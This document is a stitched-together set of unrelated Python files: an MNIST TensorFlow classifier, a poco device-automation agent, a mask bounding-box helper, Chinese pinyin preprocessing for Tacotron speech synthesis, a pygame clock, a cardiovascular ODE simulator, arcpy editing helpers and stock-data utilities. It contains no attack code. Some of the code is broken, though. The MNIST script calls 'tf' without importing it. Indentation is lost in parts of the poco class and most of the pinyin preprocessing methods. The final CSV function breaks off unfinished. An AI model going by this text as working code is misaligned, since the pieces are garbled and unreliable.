from matplotlib import pyplot as plt
import numpy as np
import time,sys,os,platform,distro,vers
from tensorflow.python.client import device_lib
#try to install TF 2 if it will run on this HW
# try:
# tensorflow_version #<< this function only exists in google colab VM
# print('installed TF 2.x')
# except Exception:
# print('could not install TF 2')
# pass
if __name__ == '__main__':
  vers.show_versions_info()
  #see if GPU is available
  physical_devices = tf.config.experimental.list_physical_devices('GPU')
  print('num GPUs ',len(physical_devices))
  # if len(physical_devices) > 0:
  #   tf.config.experimental.set_memory_growth(physical_devices[0],True)
  objects = tf.keras.datasets.mnist # many images of digits 0-9
  (training_images, training_labels),(test_images,test_labels) = objects.load_data()
  device_lib.list_local_devices()
  #print some of the digit images
  for i in range(9):
    plt.subplot(330+1+i)
    plt.imshow(training_images[i])
  # print dimensions for training data
  print(training_images.shape)
  #print 1st training image of one digit
  print(training_images[0])
  #now normalize all training and test input values to 0 - 1
  training_images = training_images / 255.0
  test_images = test_images / 255.0
  # simple dense classifier: flatten 28x28 -> 128 relu -> 10-way softmax
  m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)),
      tf.keras.layers.Dense(128,activation='relu'),
      tf.keras.layers.Dense(10,activation=tf.nn.softmax)])
  m.summary() #show summary
  # sparse labels (integer class ids) -> sparse categorical crossentropy
  m.compile(optimizer = tf.keras.optimizers.Adam(),
      loss = 'sparse_categorical_crossentropy',
      metrics=['accuracy'])
  #train the model
  t = time.time()
  m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 iterations over all data
  print(f'training duration: {time.time() - t}s')
  start_test_time = time.time()
  m.evaluate(test_images,test_labels)
  print(f'test duration: {time.time() - start_test_time}s')
  # write out one hot data values so we know what they are.
  # test_images.class_indices
  #show first image from test data
  plt.imshow(test_images[0])
  prediction=m.predict(test_images) # do all test images
  # argmax over the softmax output picks the predicted digit
  print('predicted number0: ',np.argmax(prediction[0]))
  print(': ',prediction[0])
  print('predicted number1: ',np.argmax(prediction[1]))
  print(': ',prediction[1])
  print('predicted number2: ',np.argmax(prediction[2]))
  print(': ',prediction[2])
  print('predicted number3: ',np.argmax(prediction[3]))
  print(': ',prediction[3])
  print('predicted number4: ',np.argmax(prediction[4]))
  print(': ',prediction[4])
|
# coding=utf-8
from poco.sdk.interfaces.hierarchy import HierarchyInterface
from poco.sdk.interfaces.input import InputInterface
from poco.sdk.interfaces.screen import ScreenInterface
from poco.sdk.interfaces.command import CommandInterface
__author__ = 'lxn3032'
def _assign(val, default_val):
if isinstance(val, type(None)):
return default_val
else:
return val
class PocoAgent(object):
    """
    This is the agent class for poco to communicate with target device.
    This class is an aggregation of 4 major interfaces for now.

    - :py:class:`HierarchyInterface <poco.sdk.interfaces.hierarchy.HierarchyInterface>`: defines the hierarchy
      accessibility methods such as dump(crawl the whole UI tree), getAttr(retrieve attribute value by name)
    - :py:class:`InputInterface <poco.sdk.interfaces.input.InputInterface>`: defines the simulated input methods to
      allow inject simulated input on target device
    - :py:class:`ScreenInterface <poco.sdk.interfaces.screen.ScreenInterface>`: defines methods to access the screen
      surface
    - :py:class:`CommandInterface <poco.sdk.interfaces.command.CommandInterface>`: defines methods to communicate
      with target device in arbitrary way. This is optional.
    """
    def __init__(self, hierarchy, input, screen, command=None):
        """Store the four interface implementations; any slot given as
        None is replaced by the corresponding base-interface instance."""
        self.hierarchy = _assign(hierarchy, HierarchyInterface())
        self.input = _assign(input, InputInterface())
        self.screen = _assign(screen, ScreenInterface())
        self.command = _assign(command, CommandInterface())
    def get_sdk_version(self):
        """Return the poco-sdk version on the target device.

        Base implementation returns None; concrete agents may override.
        """
        pass
|
from __future__ import absolute_import, division
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion, maximum_filter
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from scipy import ndimage
def find_bbox(mask):
    """Return per-component stats (x, y, w, h, area), background excluded.

    Runs connected-component labelling on the binarized mask; row 0 of the
    stats array always describes the background, so it is dropped.
    """
    components = cv2.connectedComponentsWithStats(mask.astype(np.uint8))
    stats = components[2]
    return stats[1:]
def transform_anns(mask, ann_type):
    """Convert an instance mask according to *ann_type*.

    'bbox' replaces every connected component by its filled bounding
    rectangle (drawn in-place with value 1); 'mask' is a pass-through.
    Returns (transformed_mask, original_mask).
    """
    mask_ori = mask.copy()
    if ann_type == 'mask':
        return mask, mask_ori
    if ann_type == 'bbox':
        for x, y, w, h, _area in find_bbox(mask):
            # thickness -1 -> filled rectangle
            cv2.rectangle(mask, (x, y), (x + w, y + h), 1, -1)
        return mask, mask_ori
if __name__ == '__main__':
    # Demo: draw filled green bounding boxes over the components of a
    # sample label image and save the visualisation.
    label_path = '2008_001227.png'
    mask = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
    bboxs = find_bbox(mask)
    mask_color = cv2.imread(label_path, cv2.IMREAD_COLOR)
    for j in bboxs:
        # (0,255,0) green, thickness -1 -> filled rectangle
        cv2.rectangle(mask_color, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), (0,255,0), -1)
    cv2.imwrite('bbox.png', mask_color)
    print('done')
|
# -*- coding: utf-8 -*-
# @Time : 2018/12/10 20:22
# @Author : MengnanChen
# @FileName: transform_pinyin.py
# @Software: PyCharm
import os
import re
import codecs
class words2pinyin:
    # Converts segmented Chinese text to pinyin via greedy longest-match
    # lookup in a word->pinyin dictionary, applying tone-sandhi rules for
    # '一', '不' and consecutive third tones.
    def __init__(self, path_pinyin=None, path_text=None):
        # path_pinyin: dictionary file, one "word=py1,py2" entry per line
        # path_text:   optional pre-segmented (space separated) text file
        self.path_pinyin = path_pinyin
        self.path_text = path_text
    def load_pinyinDict(self):
        # Parse the pinyin dictionary into {word: [pinyin, ...]}.
        dic = {}
        with codecs.open(self.path_pinyin, 'r', encoding='utf8') as f1:
            while True:
                line = f1.readline()
                if len(line) == 0:
                    break
                word, pinyin = line.strip().split('=')
                dic[word] = pinyin.split(',')
        return dic
    def load_text(self):
        '''
        :return: the text as a list of token lists split on whitespace,
                 shaped like [[...], [...], ...]
        '''
        chars = []
        with codecs.open(self.path_text, 'r', encoding='utf8') as f2:
            for line in f2.readlines():
                chars.append(line.strip().split())
        return chars
    # TODO: could be rewritten with an Aho-Corasick automaton for
    # multi-pattern matching later on.
    def transform(self, text_chars=None, text_file_list=None, use_space=False):
        '''
        :param text_chars: auto-detects list vs str input; use
                           text_file_list for multi-line text
        :param text_file_list: multi-line input — must be pre-segmented
                               lists of tokens
        :param use_space: join each result line with spaces
        :return: pinyin list for the text
        '''
        self.use_space = use_space
        pinyin_dic = self.load_pinyinDict()
        if type(text_chars) is str:
            self.text_chars = [text_chars.split(' ')]
        if type(text_chars) is list:
            self.text_chars = [text_chars]
        if text_file_list:
            # must already be segmented token lists
            self.text_chars = text_file_list
        if self.path_text:
            # must be a segmented text file; loaded as token lists
            self.text_chars = self.load_text()
        # Greedy forward maximum-match segmentation:
        # find the longest key length in the pinyin dictionary first.
        max_pinyin = 0
        for key in pinyin_dic.keys():
            if len(key) > max_pinyin:
                max_pinyin = len(key)
        # accumulator for the pinyin of every input line
        self.words = []
        # text_chars holds segmented lines; iterate line by line
        for j in range(len(self.text_chars)):
            # j indexes one sentence/line
            word = []
            for chars in self.text_chars[j]:
                # chars is one segmented token of the line
                # temporary pinyin buffer for this token
                word_ = []
                n = 0
                while n < len(chars):
                    matched = 0
                    for i in range(max_pinyin, 0, -1):
                        s = chars[n: n + i]  # substring chars[n:n+i], shrinking down to one char
                        # is the substring present in the pinyin dictionary?
                        if s in pinyin_dic:
                            if len(s) == 1:
                                # single characters default to their first listed pinyin
                                pinyin_str = pinyin_dic[s][0]
                                # tone sandhi: adjust the PREVIOUS syllable when it was '一'/'不'
                                if len(word_) > 0:
                                    if chars[n - 1] == '一' and pinyin_str[-1] == str(4):
                                        if not s in '二四六':
                                            word_[-1] = word_[-1][:-1] + str(2)
                                    if chars[n - 1] == '一' and pinyin_str[-1] != str(4):
                                        if not s in '三五七八九十':
                                            word_[-1] = word_[-1][:-1] + str(4)
                                    # NOTE(review): the next two conditions are identical
                                    # ('不' before 4th tone); the second assignment (tone 4)
                                    # can never take effect after the first sets tone 2 —
                                    # one of them presumably meant `!= str(4)`. Confirm.
                                    if chars[n - 1] == '不' and pinyin_str[-1] == str(4):
                                        word_[-1] = word_[-1][:-1] + str(2)
                                    if chars[n - 1] == '不' and pinyin_str[-1] == str(4):
                                        word_[-1] = word_[-1][:-1] + str(4)
                                word_.append(pinyin_str)
                            else:
                                word_.extend(pinyin_dic[s])
                            matched = 1
                            n = n + i
                            break
                    # no dictionary entry matched: emit the raw character and advance
                    if not matched:
                        word.append(chars[n])
                        n = n + 1
                # third-tone sandhi: a 3rd tone before another 3rd tone becomes 2nd,
                # applied right-to-left across the token
                if len(word_) > 1:
                    new_word = word_
                    for j in range(len(new_word) - 1, 0, -1):
                        i = j - 1
                        if new_word[j][-1] == str(3) and new_word[i][-1] == str(3):
                            new_word[i] = new_word[i][:-1] + str(2)
                    word_ = new_word
                word.extend(word_)
            if self.use_space:
                self.words.append(' '.join(word))
            else:
                self.words.append(word)
        return self.words
    def save_result(self, path_save):
        # Write one "NNNNNNNN pinyin..." line per input line to path_save.
        pinyin = self.words
        text = self.text_chars
        assert len(pinyin) == len(text)
        with open(path_save, 'w', encoding='utf8') as f3:
            if self.use_space:
                # entries are pre-joined strings when use_space was set
                for i, word in enumerate(pinyin):
                    f3.write(str("%08d" % i) + ' ' + pinyin[i] + '\n')
            else:
                for j, word_list in enumerate(pinyin):
                    f3.write(str("%08d" % j) + ' ' + ' '.join(pinyin[j]) + '\n')
class TacotronPreprocess:
    def __init__(self, pinyin_dict_path=os.path.join(os.path.dirname(__file__), 'dependency_data/pinyin.dict')):
        """Set up symbol tables, prosody-mark replacement rules and
        number-normalization regexes for Tacotron text preprocessing."""
        # keep symbols in clean_symbols(), some symbols such as '、',';' will be replaced by ','
        self._keep_symbols = ['?', '!', '。', ',', '、', ';']
        self._word_boundary = '&'  # mark word boundary with '&'
        self._pinyin_boundary = ' '  # the requirement mark by pinyin
        self._prosody_mark = ['#', '*', '$', '%']
        _wb = self._word_boundary
        _pb = self._pinyin_boundary
        _pm1, _pm3 = self._prosody_mark[0], self._prosody_mark[2]
        # word-boundary + punctuation pairs become prosody-marked pauses;
        # a bare word boundary becomes the level-1 prosody mark
        self._replacement_expression = [(re.compile('{}'.format(x[0]), re.IGNORECASE), x[1]) for x in [
            ('{},{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
            ('{}。{}'.format(_wb, _wb), '{}{}{}。{}'.format(_pb, _pm3, _pb, _pb)),
            ('{}!{}'.format(_wb, _wb), '{}{}{}!{}'.format(_pb, _pm3, _pb, _pb)),
            ('{}?{}'.format(_wb, _wb), '{}{}{}?{}'.format(_pb, _pm3, _pb, _pb)),
            ('{}、{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
            ('{};{}'.format(_wb, _wb), '{}{}{},{}'.format(_pb, _pm3, _pb, _pb)),
            (self._word_boundary, '{}{}{}'.format(_pb, _pm1, _pb)),
        ]]
        # numeric patterns (years, currency, percentages, fractions, …)
        # routed through number2chinese_utils; unit/symbol spellings inline
        self._number_expression = [(re.compile('{}'.format(x[0]), re.IGNORECASE), x[1]) for x in [
            ('(?P<value>\d+年)', self.number2chinese_utils),  # 1996年
            ('(?P<value>\$\d+(\.\d+))', self.number2chinese_utils),  # $12.5
            ('(?P<value>\¥\d+(\.\d+))', self.number2chinese_utils),  # ¥12.5
            ('(?P<value>\d+(\.\d+)%)', self.number2chinese_utils),  # 12.5%
            ('(?P<value>\d+(\.\d+))', self.number2chinese_utils),  # 123.4
            ('(?P<value>\d+/\d+)', self.number2chinese_utils),  # 10/13
            ('(?P<value>\d+)', self.number2chinese_utils),  # 123
            ('W', '万'),
            ('w', '万'),
            ('K', '千'),
            ('k', '千'),
            ('-', '至'),
            ('~', '至'),
            ('/', '每'),
            ('°', '度'),
            ('’', '分'),
            ('<', '小于'),
            ('\+', '加'),
        ]]
        self._pinyin_dict_path = pinyin_dict_path
def _is_chinese_char(self, cp):
# check cp is chinese or not
cp = ord(cp)
if ((cp >= 0x4E00 and cp <= 0x9FFF) or
(cp >= 0x3400 and cp <= 0x4DBF) or
(cp >= 0x20000 and cp <= 0x2A6DF) or
(cp >= 0x2A700 and cp <= 0x2B73F) or
(cp >= 0x2B740 and cp <= 0x2B81F) or
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or
(cp >= 0x2F800 and cp <= 0x2FA1F)):
return True
return False
def _e2c_punctuation(self, text):
# translate english punctuation to chinese punctuation
e_pun = u',.!?[]()<>"\''
c_pun = u',。!?【】()《》“‘'
table = {ord(f): ord(t) for f, t in zip(e_pun, c_pun)}
return text.translate(table)
def clean_symbols(self, input_path, output_path):
# clean symbol in text, allow symbols in self._keep_symbols and '、',';' etc will be replaced by ','
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
line = self._e2c_punctuation(line) # translate english symbols to chinese symbols
line_t = []
for char in line:
if self._is_chinese_char(char) \
or char in self._keep_symbols \
or char.isdigit() \
or char.isalnum() \
or char == ' ':
line_t.append(char)
line = '{}\n'.format(''.join(line_t))
fout.write(line.encode('utf-8'))
def _independence_number2chinese(self, number: str):
# translate arabic to independent chinese
number = number.strip('\r\n ')
if len(number) < 1 or not number.isdigit():
return ''
digit_to_chi = {
'0': '零',
'1': '一',
'2': '二',
'3': '三',
'4': '四',
'5': '五',
'6': '六',
'7': '七',
'8': '八',
'9': '九',
}
result = [digit_to_chi[n] for n in number]
return ''.join(result)
def _integer_number2chinese(self, number: str):
# translate intergral number into chinese, only support to 999,9999(max: 999,9999,9999)
number = number.strip('\r\n ')
try:
number = int(number)
except:
return ''
if not isinstance(number, (int,)) or number < 0:
return ''
elif number >= pow(10, 7):
return self._independence_number2chinese(str(number))
if number == 0:
return '零'
digit_to_hanzi = {
'0': '零',
'1': '一',
'2': '二',
'3': '三',
'4': '四',
'5': '五',
'6': '六',
'7': '七',
'8': '八',
'9': '九',
}
# for every 4 position
sections = {
4: '万',
8: '亿',
}
# the number2chinese for 1~999, for example, 350 -> 3百, 5十
per_section = {
1: '十',
2: '百',
3: '千',
}
# number_string = unicode(number)
number_string = str(number)
def convert_four_number(num):
# num is already inverse order
res = ''
for i, val in enumerate(num):
tmp = digit_to_hanzi.get(val)
if val != '0':
tmp += per_section.get(i % 4, '')
res = tmp + res
return res
result = []
four_number_round = ''
total_count = len(number_string)
for i, val in enumerate(reversed(number_string)):
if i in sections:
result.insert(0, sections[i])
# for every 4 position
four_number_round += val
if len(four_number_round) < 4 and i + 1 < total_count:
continue
insert_val = convert_four_number(four_number_round)
# put last 4 position directly
if i < 4:
insert_val = insert_val.rstrip('零')
# all zeros, replace '万', '亿' with '零'
elif all([i == '零' for i in insert_val]):
result[0] = '零'
# non-all-zeros
# Then: multiple zeros at the end are merged into one zero and swap the position with '万'/'亿'
elif insert_val.endswith('零'):
insert_val = insert_val.rstrip('零')
pos_zero = result.pop(0)
insert_val = insert_val + pos_zero + '零'
result.insert(0, insert_val)
four_number_round = ''
result = ''.join(result)
# 10: 一十 -> 十
# 10,0000: 一十万 -> 十万
if result.startswith('一十'):
result = result.lstrip('一')
# del redundant '零'
result = result.strip('零')
# 1001: 一千零零一 -> 一千零一
result = re.sub(r'零+', '零', result)
return result
def _float_number2chinese(self, number: str):
number = number.strip('\r\n ')
int_number = number.split('.')[0]
float_number = ''.join(number.split('.')[1:])
result = '{}点{}'.format(self._integer_number2chinese(int_number),
self._independence_number2chinese(float_number))
return result
def number2chinese_utils(self, number):
# number: re object
try:
number = str(number.group('value'))
except:
print('number error in number2chinese_utils, get object: {}'.format(number))
if '年' == number[-1]: # '1997年'
result = '{}年'.format(self._independence_number2chinese(number[:-1]))
elif '$' == number[0]: # '$12.5'
result = '{}美元'.format(self._float_number2chinese(number[1:]))
elif '¥' == number[0]: # '¥12.5'
result = '{}元'.format(self._float_number2chinese(number[1:]))
elif '%' == number[-1]: # '12.5%'
result = '百分之{}'.format(self._float_number2chinese(number[:-1]))
elif '/' in number: # '10/13'
son = number.split('/')[0]
father = ''.join(number.split('/')[1:])
result = '{}分之{}'.format(self._integer_number2chinese(father), self._integer_number2chinese(son))
elif '.' in number: # '12.5'
result = self._float_number2chinese(number)
else:
result = self._integer_number2chinese(number)
return result
def number2chinese(self, input_path, output_path):
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
for regex, replacement in self._number_expression:
line = re.sub(regex, replacement, line)
line = '{}\n'.format(line)
fout.write(line.encode('utf-8'))
def prosody_prediction(self, input_path, output_path):
# word boudary will be '#1'
# ',' etc punctuation will be '#3'
# the end of sentences will be '#4'
wordcut_type = None
try:
from pyhanlp import HanLP
wordcut_type = 'hanlp'
except ImportError:
print('cannot import HanLP')
if wordcut_type is None:
try:
import jieba
wordcut_type = 'jieba'
except ImportError:
print('cannot import jieba')
assert wordcut_type is not None, 'no package to word cut'
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
if wordcut_type == 'hanlp':
line = HanLP.segment(line)
line = [str(x).split('/')[0] for x in line]
line = self._word_boundary.join(line)
elif wordcut_type == 'jieba':
# add new word here
jieba.suggest_freq('您的', tune=True)
jieba.suggest_freq('您呢', tune=True)
line = self._word_boundary.join(jieba.cut(line, HMM=True))
for regex, replacement in self._replacement_expression:
line = re.sub(regex, replacement, line)
try:
if line[-1] not in self._keep_symbols:
line = '{} {} {}\n'.format(line[:-4], self._prosody_mark[3],
'。') # default end of utterence is '。'
else:
# input line: '我行 # 邀请 # 你 # 办理 # 业务 # 。'
# output line: '我行 # 邀请 # 你 # 办理 # 业务 % 。'
line = '{} {} {}\n'.format(line[:-4], self._prosody_mark[3], line[-1])
except:
print('error in wordcut, line:', line)
fout.write(line.encode('utf-8'))
def transform_pinyin(self, input_path, output_path):
# transform chinese to pinyin
# text format should be ''
# which means prosody mark should by gapped by self._pinyin_boundary
assert os.path.isfile(self._pinyin_dict_path), 'pinyin dict not found'
self._w2p = words2pinyin(path_pinyin=self._pinyin_dict_path, path_text=input_path)
res = self._w2p.transform()
res = ['{}\n'.format(' '.join(x)).encode('utf-8') for x in res]
with open(output_path, 'wb') as fout:
fout.writelines(res)
def text2pinyin(self, input_path, output_path):
# directly transform pure text file to pinyin file
# include: number to chinese, clean symbols, prosody prediction, transform pinyin
self._tmp_dir = 'tmp_data'
os.makedirs(self._tmp_dir, exist_ok=True)
tmp_output_path1 = os.path.join(self._tmp_dir, 'tmp_data1')
tmp_output_path2 = os.path.join(self._tmp_dir, 'tmp_data2')
tmp_output_path3 = os.path.join(self._tmp_dir, 'tmp_data3')
# first number to chinese then clean symbols, because 12.5, 12.5%, 12元/股 etc.
self.number2chinese(input_path, tmp_output_path1)
self.clean_symbols(tmp_output_path1, tmp_output_path2)
self.prosody_prediction(tmp_output_path2, tmp_output_path3)
self.transform_pinyin(tmp_output_path3, output_path)
if __name__ == '__main__':
    # Demo: convert the BiaoBei pure-text corpus into its pinyin form.
    source_path = 'data/biaobei.puretext'
    target_path = 'data/biaobei.pinyin'
    preprocessor = TacotronPreprocess()
    preprocessor.text2pinyin(source_path, target_path)
|
import sys, pygame
import core, timer, AlarmClock

# Window configuration and one-time pygame display setup.
background_colour = (255, 255, 255)
width, height = 300, 200
screen = pygame.display.set_mode((width, height))
pygame.display.set_caption('clock app')

# Paint the initial blank frame.
screen.fill(background_colour)
pygame.display.flip()

running = True
# Top-level GUI object driven by main()'s event loop.
Gui = AlarmClock.AlarmClock()
def main():
    """Run the clock app's event loop.

    Each frame: update the GUI, drain the event queue, refresh the display,
    render all buttons, and check every alarm.  The loop only terminates via
    sys.exit() when the window is closed.
    """
    while True:
        Gui.onupdate()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # Shut pygame down cleanly, then terminate.  (The original
                # called pygame.quit() at module import time — before main()
                # ever ran — which tore pygame down under the event loop.)
                pygame.quit()
                sys.exit()
        pygame.display.update()
        for temp in core.allButton:
            temp.Render(screen)
        for alarmClock in AlarmClock.allAlarm:
            alarmClock.CheckAlarm()


if __name__ == "__main__":
    main()
|
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
import torch
def init_random_state():
    """Draw a random initial CVS state vector [p_a, p_v, s, sv].

    Each quantity is sampled uniformly from a fixed band and rescaled to the
    normalized units expected by dx_dt().  The ves/ved draws are kept (even
    though they do not enter the returned state) so the RNG stream matches
    the original implementation exactly.
    """
    def _uniform(low, high):
        # one uniform sample in [low, high)
        return np.random.rand() * (high - low) + low

    # sampling order is significant for seeded reproducibility
    init_ves = _uniform(36.0 + 10.0, 64.0 - 10.0) / 100.0
    init_ved = _uniform(121.0 + 10.0, 167.0 - 10.0) / 100.0
    init_sv = _uniform(0.9, 1.0)
    init_pa = _uniform(75.0, 85.0) / 100.0
    init_pv = _uniform(3.0, 7.0) / 10.0
    init_s = _uniform(0.15, 0.25)
    return np.array([init_pa, init_pv, init_s, init_sv])
def dx_dt(state, t, params):
    """Time derivative of the cardiovascular state, for scipy's odeint.

    state: normalized [p_a/100, p_v/10, s, sv/100]; t is unused (the system
    is autonomous); params holds the model constants (see get_random_params).
    Returns d(state)/dt in the same normalized units.
    """
    # Known model constants
    f_hr_max, f_hr_min = params["f_hr_max"], params["f_hr_min"]
    r_tpr_max, r_tpr_min = params["r_tpr_max"], params["r_tpr_min"]
    ca, cv = params["ca"], params["cv"]
    k_width, p_aset, tau = params["k_width"], params["p_aset"], params["tau"]
    # Unknown (intervention) parameters
    i_ext = params["i_ext"]
    r_tpr_mod = params["r_tpr_mod"]
    sv_mod = params["sv_mod"]

    # Undo the normalization to recover physical units
    p_a = 100. * state[0]
    p_v = 10. * state[1]
    s = state[2]
    sv = 100. * state[3]

    # Heart rate and total peripheral resistance track sympathetic tone s
    f_hr = s * (f_hr_max - f_hr_min) + f_hr_min
    r_tpr = s * (r_tpr_max - r_tpr_min) + r_tpr_min - r_tpr_mod

    # Volume exchange between arterial and venous compartments
    dva_dt = -1. * (p_a - p_v) / r_tpr + sv * f_hr
    dvv_dt = -1. * dva_dt + i_ext

    # Pressure derivatives (renormalized), baroreflex drive, stroke-volume drift
    dpa_dt = dva_dt / (ca * 100.)
    dpv_dt = dvv_dt / (cv * 10.)
    ds_dt = (1. / tau) * (1. - 1. / (1 + np.exp(-1 * k_width * (p_a - p_aset))) - s)
    dsv_dt = i_ext * sv_mod

    return np.array([dpa_dt, dpv_dt, ds_dt, dsv_dt])
def states_trajectory_to_sample(states, params):
    """Map a state trajectory (T, 4) to observables (T, 3): [p_a, p_v, f_hr].

    Heart rate is reconstructed from sympathetic tone s (column 2) via the
    same affine map used inside dx_dt().
    """
    tone = states[:, 2]
    heart_rate = tone * (params["f_hr_max"] - params["f_hr_min"]) + params["f_hr_min"]
    return np.stack((states[:, 0], states[:, 1], heart_rate), axis=1)
def create_example(sample):
    """Plot one generated sample (Pa, Pv, f_hr over time) to CVS_example.png."""
    n_steps = sample.shape[0]
    t_axis = range(n_steps)
    fig, axs = plt.subplots(3)
    # (column, colour, label, y-label, y-limits) for the two pressure panels
    pressure_panels = [
        (0, 'r', 'Pa', 'Pa [mmHg]', (0.0, 1.5)),
        (1, 'b', 'Pv', 'Pv [mmHg]', (0.0, 1.0)),
    ]
    for col, colour, label, ylabel, ylim in pressure_panels:
        axs[col].plot(t_axis, sample[:n_steps, col], colour, label=label)
        axs[col].set(ylabel=ylabel)
        axs[col].set(ylim=ylim)
    # Heart rate is stored in Hz; display in beats per minute
    axs[2].plot(t_axis, sample[:n_steps, 2] * 60, 'k', label='f_hr')
    axs[2].set(ylabel='f_hr [bpm]')
    axs[2].set(ylim=(40, 200))
    for ax in axs:
        ax.set(xlabel='time')
        ax.grid()
    plt.savefig('CVS_example.png')
def get_random_params():
    """Sample model parameters for one CVS trajectory.

    i_ext (external fluid input) and r_tpr_mod (resistance modifier) are each
    switched on with probability 1/2; all other entries are fixed constants.
    The two RNG draws happen in the original order (i_ext first) so seeded
    runs reproduce the same interventions.
    """
    i_ext = -2.0 if np.random.rand() <= 0.5 else 0.0
    r_tpr_mod = 0.5 if np.random.rand() <= 0.5 else 0.0
    fixed = {
        "f_hr_max": 3.0,
        "f_hr_min": 2.0 / 3.0,
        "r_tpr_max": 2.134,
        "r_tpr_min": 0.5335,
        "sv_mod": 0.0001,
        "ca": 4.0,
        "cv": 111.0,
        # dS/dt parameters
        "k_width": 0.1838,
        "p_aset": 70,
        "tau": 20,
        # left-ventricle constants (not read by dx_dt, kept for compatibility)
        "p_0lv": 2.03,
        "r_valve": 0.0025,
        "k_elv": 0.066,
        "v_ed0": 7.14,
        "T_sys": 4. / 15.,
        "cprsw_max": 103.8,
        "cprsw_min": 25.9,
    }
    return {"i_ext": i_ext, "r_tpr_mod": r_tpr_mod, **fixed}
def create_cvs_data(args):
    """Simulate args.data_size cardiovascular trajectories.

    Returns (raw_data, latent_data, params_data): observables of shape
    (N, seq_len, 3), latent states of shape (N, seq_len, 4), and the list of
    per-trajectory parameter dicts.  For the 'cvs' model an extra 50-step
    warm-up is integrated and then discarded.
    """
    warmup = 50 if args.model == 'cvs' else 0
    t = np.arange(0.0, stop=(args.seq_len + warmup) * args.delta_t, step=args.delta_t)
    raw_data = np.zeros((args.data_size, args.seq_len, 3))
    latent_data = np.zeros((args.data_size, args.seq_len, 4))
    params_data = []
    for idx in range(args.data_size):
        # draw order (state first, then params) preserves the RNG stream
        init_state = init_random_state()
        params = get_random_params()
        params_data.append(params)
        trajectory = integrate.odeint(dx_dt, init_state, t, args=(params,))[warmup:]
        raw_data[idx] = states_trajectory_to_sample(trajectory, params)
        latent_data[idx] = trajectory
    return raw_data, latent_data, params_data
|
# coding=utf-8
"""This module contains functions that simplify data management activities."""
# Python 2/3 compatibility
# pylint: disable=wildcard-import,unused-wildcard-import,wrong-import-order,wrong-import-position
from __future__ import (absolute_import, division, print_function, unicode_literals)
from future.builtins.disabled import *
from future.builtins import *
from future.standard_library import install_aliases
install_aliases()
# pylint: enable=wildcard-import,unused-wildcard-import,wrong-import-order,wrong-import-position
import arcpy
def create_rows(edit_session, in_table, rows, field_names = "*"):
    """Insert *rows* into *in_table* inside an edit operation on *edit_session*."""
    _create_rows(edit_session, in_table, rows, field_names)
def delete_rows(edit_session, in_table, where_clause = None, field_names = "*"):
    """Delete every row of *in_table* matching *where_clause* (None = all rows)
    inside an edit operation on *edit_session*."""
    _delete_rows(edit_session, in_table, where_clause, field_names)
def read_rows(in_table, where_clause = None, field_names = "*"):
    """Return all rows of *in_table* matching *where_clause* as a list.

    Read-only, so no edit session is required.
    """
    with arcpy.da.SearchCursor(in_table, field_names, where_clause) as cursor:
        return list(cursor)
def update_rows_func(edit_session, in_table, update_func, where_clause = None, field_names = "*"):
    """Rewrite each matching row of *in_table* with update_func(row), inside an
    edit operation on *edit_session*."""
    _update_rows_func(edit_session, in_table, update_func, where_clause, field_names)
###############################################################################
# PRIVATE FUNCTIONS
###############################################################################
def _edit_handler(func):
    """Decorator: run *func* as a single edit operation.

    The wrapped function's first positional argument must expose
    startOperation/abortOperation/stopOperation (an arcpy edit session).
    The operation is started before the call; on any exception it is aborted
    and the exception re-raised; on success it is stopped (committed) and the
    wrapped function's return value is passed through.
    """
    import functools

    @functools.wraps(func)  # preserve func's name/docstring on the wrapper
    def wrapper(*args, **kwargs):
        edit_session = args[0]
        edit_session.startOperation()
        try:
            result = func(*args, **kwargs)
        except Exception:
            # Roll back the partial operation, then propagate the error.
            edit_session.abortOperation()
            raise
        edit_session.stopOperation()
        return result
    return wrapper
@_edit_handler
def _create_rows(edit_session, in_table, rows, field_names):
    # Insert every supplied row through a single InsertCursor.
    with arcpy.da.InsertCursor(in_table, field_names) as cursor:
        for new_row in rows:
            cursor.insertRow(new_row)
@_edit_handler
def _delete_rows(edit_session, in_table, where_clause, field_names):
    # deleteRow() removes the row the cursor is currently positioned on,
    # so the loop variable itself is unused.
    with arcpy.da.UpdateCursor(in_table, field_names, where_clause) as cursor:
        for _ in cursor:
            cursor.deleteRow()
@_edit_handler
def _update_rows_func(edit_session, in_table, update_func, where_clause, field_names):
    # Replace each matching row with whatever update_func returns for it.
    with arcpy.da.UpdateCursor(in_table, field_names, where_clause) as cursor:
        for current_row in cursor:
            cursor.updateRow(update_func(current_row))
|
import json
import csv
import numpy as np
from stockstats import StockDataFrame
import pandas as pd
import mplfinance as mpf
import seaborn as sn
import matplotlib.pyplot as plt
def load_secrets():
    """
    Load data from secret.json as JSON.

    :return: Dict parsed from the file.
    :raises OSError: if secret.json cannot be opened.
    :raises json.JSONDecodeError: if the file is not valid JSON.
    """
    # No try/except here: the original `except Exception as e: raise e`
    # handled nothing and only obscured the traceback origin.
    with open('secret.json', 'r') as fp:
        return json.load(fp)
def to_csv(filename, input_list: list):
    """
    Write a list of dicts to a CSV file, one row per dict.

    The header is taken from the first dict's keys and every row is emitted
    in that header order (the original took the header from the *last* dict
    and wrote each row in its own key order, misaligning columns when the
    dicts differed).  An empty input list produces an empty file.

    :param input_list: List of dicts sharing a common set of keys.
    :param filename: filename.csv
    :return: None
    """
    # newline="" is required by the csv module; without it blank lines are
    # inserted between rows on Windows.
    with open(filename, "w", newline="") as outfile:
        if not input_list:
            return
